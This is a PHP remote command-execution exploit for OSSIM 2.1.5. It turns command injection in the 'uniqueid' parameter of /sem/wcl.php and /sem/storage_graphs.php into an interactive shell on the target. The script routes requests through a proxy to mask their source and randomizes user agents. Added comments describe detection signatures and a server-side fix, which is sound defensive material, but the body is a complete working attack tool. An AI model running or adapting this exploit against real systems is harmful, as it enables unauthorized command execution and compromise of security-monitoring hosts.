OSSIM version 2.1.5 remote command execution exploit that provides an interactive shell.
bef9966d950f3e0d9d428031d48dd2b827b0c0302d70ef1af2a23c9bec42655e
<?php
/*
* Remote Execution Exploit for OSSIM - Interactive Shell
* Affected Applications: Confirmed in OSSIM 2.1.5. Other versions may also be affected.
*
* Author: Ricardo Almeida
* email: ricardojba[at]aeiou[DoT]pt
*
* Credits: Researcher: Nahuel Grisolía
* ngrisolia <at> cybsec <dot> com
*/
/**
 * Send one HTTP GET request for $url through a hard-coded proxy and return the result.
 *
 * Returns the raw response (headers included, because CURLOPT_HEADER is set) when the
 * final status is 200; otherwise returns the string "Fail! :<status>\r\n".
 *
 * Notes for log review and detection:
 *  - The User-Agent is synthesized as "<name>/<d>.<d> (<os> <d>.<d>; en-US;)". No real
 *    browser emits that shape (e.g. an OS label followed by a random version number),
 *    so it stands out in web-server access logs.
 *  - The index ranges are 0..3 and 0..5, so the trailing entries of each list
 *    ('Safari', 'Konqueror', 'Minix') are never selected.
 *  - The proxy is an RFC 1918 address; the variable name suggests a local Tor/HTTP
 *    proxy was intended (assumption, nothing on the page confirms it), so the source
 *    IP seen by the target would be that of the proxy exit, not of the operator.
 *
 * @param string $url Fully built request URL.
 * @return string Response text on HTTP 200, or a "Fail! :<code>" line.
 */
function wrap($url)
{
    $browsers = array('Mozilla','Opera','Microsoft Internet Explorer','Chrome','Safari','Konqueror');
    $systems = array('Windows 7','Windows XP','Ubuntu','Windows Vista','ReactOS','OSX','Minix');

    // Arguments are evaluated left to right, matching the original concatenation order.
    $agent = sprintf(
        '%s/%d.%d (%s %d.%d; en-US;)',
        $browsers[rand(0,3)],
        rand(1,8),
        rand(0,9),
        $systems[rand(0,5)],
        rand(1,7),
        rand(0,9)
    );

    $proxy = '172.16.0.253:8080';
    $timeout = '300';

    $handle = curl_init();
    curl_setopt_array($handle, array(
        CURLOPT_PROXY => $proxy,
        CURLOPT_URL => $url,
        CURLOPT_HEADER => 1,          // response headers are returned along with the body
        CURLOPT_USERAGENT => $agent,
        CURLOPT_RETURNTRANSFER => 1,  // hand the response back instead of printing it
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_TIMEOUT => $timeout,
    ));
    $response = curl_exec($handle);
    $meta = curl_getinfo($handle);
    curl_close($handle);

    // Anything other than a final 200 is reported as a failure line with the status code.
    if ($meta['http_code'] != '200') {
        return "Fail! :".$meta['http_code']."\r\n";
    }

    return $response;
}
// Command-line driver: expects a target host and a variant number (1 or 2), then loops
// reading one line from STDIN per iteration and issuing a single GET request for it.
//
// What the request looks like on the wire (useful for detection and triage):
//  - variant 1: /sem/wcl.php?uniqueid=1;<input>%20%3E%20/tmp/listing
//  - variant 2: /sem/storage_graphs.php?uniqueid=;<input>%20%3E%20/tmp/listing;
//  - "%20%3E%20" decodes to " > ", so the `uniqueid` value carries a ';' separator
//    followed by text and a shell redirection into /tmp/listing. This implies the
//    affected pages pass `uniqueid` to a shell without validation (inferred from the
//    request shape; the server-side code is not on this page).
//
// Defensive takeaways:
//  - Alert on requests to either /sem/ path whose `uniqueid` contains ';', '%3B',
//    '>' or '%3E'; a legitimate identifier has no reason to carry shell metacharacters.
//  - An unexpected /tmp/listing file on an OSSIM host is a host-side artifact to check.
//  - Server-side fix: validate `uniqueid` against a strict allow-list pattern and
//    escape every value that reaches a shell command (escapeshellarg()).
//
// Only spaces in the input line are percent-encoded; every other character is sent
// as typed. A variant value other than 1 or 2 sends no request at all.
if ($argc != 3) {
    die("Usage: $argv[0] <host> <url 1 or 2>\nEx: $argv[0] www.host.com 1\n");
}

$host = $argv[1];
$url = $argv[2];

while (true) {
    fwrite(STDOUT, "[shell:~ # ");
    $cmd = str_replace(' ', '%20', trim(fgets(STDIN)));

    // Local keywords that end the session; nothing is sent for them.
    if (in_array($cmd, array("exit", "quit"))) {
        die();
    }

    if ($url == 1) {
        $request = "http://".$host."/sem/wcl.php?uniqueid=1;".$cmd."%20%3E%20/tmp/listing";
        echo wrap($request);
        continue;
    }

    if ($url == 2) {
        $request = "http://".$host."/sem/storage_graphs.php?uniqueid=;".$cmd."%20%3E%20/tmp/listing;";
        echo wrap($request);
    }
}